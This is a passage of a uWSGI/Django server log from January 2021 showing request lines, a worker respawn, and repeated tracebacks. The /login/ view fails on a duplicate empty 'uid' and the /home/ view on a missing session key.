query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.IntegrityError: (1062, "Duplicate entry '' for key 'uid'") +[pid: 15176|app: 0|req: 2854/3991] 114.42.220.207 () {46 vars in 906 bytes} [Fri Jan 15 01:30:06 2021] POST /login/ => generated 208401 bytes in 105 msecs (HTTP/1.1 500) 6 headers in 187 bytes (2 switches on core 1) +[pid: 15176|app: 0|req: 2855/3992] 219.228.146.126 () {36 vars in 704 bytes} [Fri Jan 15 01:30:06 2021] GET /home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 0) +Internal Server Error: /home/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 38, in home + response['uid'] = request.session['uid'] + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/contrib/sessions/backends/base.py", line 65, in __getitem__ + return self._session[key] +KeyError: 'uid' +[pid: 15176|app: 0|req: 2856/3993] 219.228.146.126 () {36 vars in 706 bytes} [Fri Jan 15 01:30:06 2021] GET /home/ => generated 61224 bytes in 117 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 0) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.IntegrityError: (1062, "Duplicate entry '' for key 'uid'") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.IntegrityError: (1062, "Duplicate entry '' for key 'uid'") +[pid: 15176|app: 0|req: 2857/3994] 114.42.220.207 () {46 vars in 906 bytes} [Fri Jan 15 01:30:07 2021] POST /login/ => generated 208401 bytes in 128 msecs (HTTP/1.1 500) 6 headers in 187 bytes (2 switches on core 1) +[pid: 15176|app: 0|req: 2858/3995] 223.104.212.22 () {36 vars in 631 bytes} [Fri Jan 15 01:30:08 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2859/3996] 114.42.220.207 () {46 vars in 907 bytes} [Fri Jan 15 01:30:08 2021] POST /login/ => generated 27 bytes in 20 msecs (HTTP/1.1 200) 7 headers in 324 bytes (2 switches on core 0) +[pid: 15176|app: 0|req: 2860/3997] 223.104.212.22 () {36 vars in 633 bytes} [Fri Jan 15 01:30:08 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3998] 223.104.212.22 () {38 vars in 750 bytes} [Fri Jan 15 01:30:08 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3999] 223.104.212.22 () {38 vars in 728 bytes} [Fri Jan 15 01:30:08 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/4000] 223.104.212.22 () {38 vars in 732 bytes} [Fri Jan 15 01:30:08 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/4001] 223.104.212.22 () {38 vars in 730 bytes} [Fri Jan 15 01:30:08 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +...The work of process 15176 is done. Seeya! +worker 1 killed successfully (pid: 15176) +Respawned uWSGI worker 1 (new pid: 25874) +[pid: 25874|app: -1|req: -1/4002] 223.104.212.22 () {38 vars in 736 bytes} [Fri Jan 15 01:30:09 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4003] 223.104.212.22 () {38 vars in 711 bytes} [Fri Jan 15 01:30:09 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: 0|req: 2861/4004] 114.42.220.207 () {38 vars in 864 bytes} [Fri Jan 15 01:30:09 2021] GET /home => generated 0 bytes in 63 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2862/4005] 114.42.220.207 () {38 vars in 866 bytes} [Fri Jan 15 01:30:09 2021] GET /home/ => generated 10766 bytes in 191 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1) +[uwsgi-http key: 188.131.132.108:8000 client_addr: 114.42.220.207 client_port: 1764] hr_write(): Broken pipe [plugins/http/http.c line 565] +[pid: 25874|app: -1|req: -1/4006] 114.42.220.207 () {36 vars in 795 bytes} [Fri Jan 15 01:30:10 2021] GET /static/img/t_photo/10_love.jpg => generated 15609 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4007] 114.42.220.207 () {36 vars in 793 bytes} [Fri Jan 15 01:30:10 2021] GET /static/img/t_photo/4_math.png => generated 587232 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4008] 114.42.220.207 () {36 vars in 799 bytes} [Fri Jan 15 01:30:10 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 14933 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[uwsgi-http key: 188.131.132.108:8000 client_addr: 114.42.220.207 client_port: 6884] hr_write(): Broken pipe [plugins/http/http.c line 565] +[pid: 25874|app: 0|req: 2863/4009] 219.228.146.190 () {38 vars in 929 bytes} [Fri Jan 15 01:30:11 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2864/4010] 219.228.146.190 () {38 vars in 931 bytes} [Fri Jan 15 01:30:11 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2865/4011] 219.228.146.190 () {38 vars in 931 bytes} [Fri Jan 15 01:30:13 2021] GET /login/ => generated 6428 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 25874|app: -1|req: -1/4012] 219.228.146.190 () {40 vars in 993 bytes} [Fri Jan 15 01:30:13 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4013] 219.228.146.190 () {40 vars in 971 bytes} [Fri Jan 15 01:30:13 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4014] 219.228.146.190 () {40 vars in 973 bytes} [Fri Jan 15 01:30:13 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4015] 219.228.146.190 () {40 vars in 979 bytes} [Fri Jan 15 01:30:13 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4016] 219.228.146.190 () {40 vars in 975 bytes} [Fri Jan 15 01:30:13 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4017] 219.228.146.190 () {40 vars in 970 bytes} [Fri Jan 15 01:30:14 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4018] 219.228.146.190 () {40 vars in 954 bytes} [Fri Jan 15 01:30:14 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4019] 219.228.146.190 () {40 vars in 952 bytes} [Fri Jan 15 01:30:14 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4020] 219.228.146.190 () {40 vars in 968 bytes} [Fri Jan 15 01:30:15 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4021] 219.228.146.190 () {40 vars in 960 bytes} [Fri Jan 15 01:30:15 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4022] 223.104.212.22 () {38 vars in 709 bytes} [Fri Jan 15 01:30:16 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4023] 223.104.212.22 () {38 vars in 727 bytes} [Fri Jan 15 01:30:16 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[uwsgi-http key: 188.131.132.108:8000 client_addr: 219.228.146.190 client_port: 31966] hr_write(): Broken pipe [plugins/http/http.c line 565] +[pid: 25874|app: -1|req: -1/4024] 114.42.220.207 () {36 vars in 812 bytes} [Fri Jan 15 01:30:20 2021] GET /static/img/back-top-btn.png => generated 1789 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4025] 223.104.212.22 () {38 vars in 725 bytes} [Fri Jan 15 01:30:20 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: 0|req: 2866/4026] 219.228.146.126 () {36 vars in 706 bytes} [Fri Jan 15 01:30:22 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 0) +[pid: 25874|app: -1|req: -1/4027] 223.104.212.22 () {38 vars in 717 bytes} [Fri Jan 15 01:30:25 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 25874|app: 0|req: 2867/4028] 101.84.174.113 () {38 vars in 926 bytes} [Fri Jan 15 01:30:26 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 0) +[uwsgi-http key: 188.131.132.108:8000 client_addr: 223.104.212.22 client_port: 8381] hr_write(): Connection reset by peer [plugins/http/http.c line 565] +[pid: 25874|app: 0|req: 2868/4029] 101.84.174.113 () {38 vars in 928 bytes} [Fri Jan 15 01:30:26 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2869/4030] 114.42.220.207 () {38 vars in 887 bytes} [Fri Jan 15 01:30:29 2021] GET /home/single.html => generated 10766 bytes in 17 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2870/4031] 101.84.174.113 () {38 vars in 928 bytes} [Fri Jan 15 01:30:32 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 25874|app: -1|req: -1/4032] 101.84.174.113 () {40 vars in 968 bytes} [Fri Jan 15 01:30:32 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4033] 101.84.174.113 () {40 vars in 972 bytes} [Fri Jan 15 01:30:32 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4034] 101.84.174.113 () {40 vars in 969 bytes} [Fri Jan 15 01:30:32 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4035] 101.84.174.113 () {40 vars in 990 bytes} [Fri Jan 15 01:30:32 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4036] 101.84.174.113 () {40 vars in 976 bytes} [Fri Jan 15 01:30:32 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: 0|req: 2871/4037] 219.228.146.126 () {36 vars in 708 bytes} [Fri Jan 15 01:30:32 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 25874|app: -1|req: -1/4038] 219.228.146.126 () {38 vars in 731 bytes} [Fri Jan 15 01:30:32 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4039] 219.228.146.126 () {38 vars in 753 bytes} [Fri Jan 15 01:30:32 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4040] 219.228.146.126 () {38 vars in 735 bytes} [Fri Jan 15 01:30:32 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4041] 219.228.146.126 () {38 vars in 733 bytes} [Fri Jan 15 01:30:32 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4042] 219.228.146.126 () {38 vars in 739 bytes} [Fri Jan 15 01:30:32 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4043] 219.228.146.126 () {38 vars in 714 bytes} [Fri Jan 15 01:30:32 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4044] 219.228.146.126 () {38 vars in 712 bytes} [Fri Jan 15 01:30:32 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4045] 219.228.146.126 () {38 vars in 720 bytes} [Fri Jan 15 01:30:32 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4046] 219.228.146.126 () {38 vars in 730 bytes} [Fri Jan 15 01:30:32 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4047] 219.228.146.126 () {38 vars in 728 bytes} [Fri Jan 15 01:30:32 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4048] 101.84.174.113 () {40 vars in 949 bytes} [Fri Jan 15 01:30:36 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4049] 101.84.174.113 () {40 vars in 967 bytes} [Fri Jan 15 01:30:36 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4050] 101.84.174.113 () {40 vars in 965 bytes} [Fri Jan 15 01:30:36 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4051] 101.84.174.113 () {40 vars in 951 bytes} [Fri Jan 15 01:30:36 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4052] 101.84.174.113 () {40 vars in 957 bytes} [Fri Jan 15 01:30:36 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4053] 101.84.174.113 () {40 vars in 1046 bytes} [Fri Jan 15 01:30:37 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4054] 101.84.174.113 () {40 vars in 1052 bytes} [Fri Jan 15 01:30:37 2021] GET /static/img/back-top-btn.png => generated 1789 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4055] 101.84.174.113 () {40 vars in 1020 bytes} [Fri Jan 15 01:30:37 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 25874|app: 0|req: 2872/4056] 114.42.220.207 () {38 vars in 898 bytes} [Fri Jan 15 01:30:38 2021] GET /home/single.html => generated 10766 bytes in 15 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1) +[pid: 25874|app: -1|req: -1/4057] 219.228.146.126 () {38 vars in 785 bytes} [Fri Jan 15 01:30:38 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4058] 219.228.146.126 () {38 vars in 759 bytes} [Fri Jan 15 01:30:39 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 25874|app: 0|req: 2873/4059] 114.42.220.207 () {38 vars in 898 bytes} [Fri Jan 15 01:30:42 2021] GET /home/single.html => generated 10766 bytes in 16 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 0) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.IntegrityError: (1062, "Duplicate entry '' for key 'uid'") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File 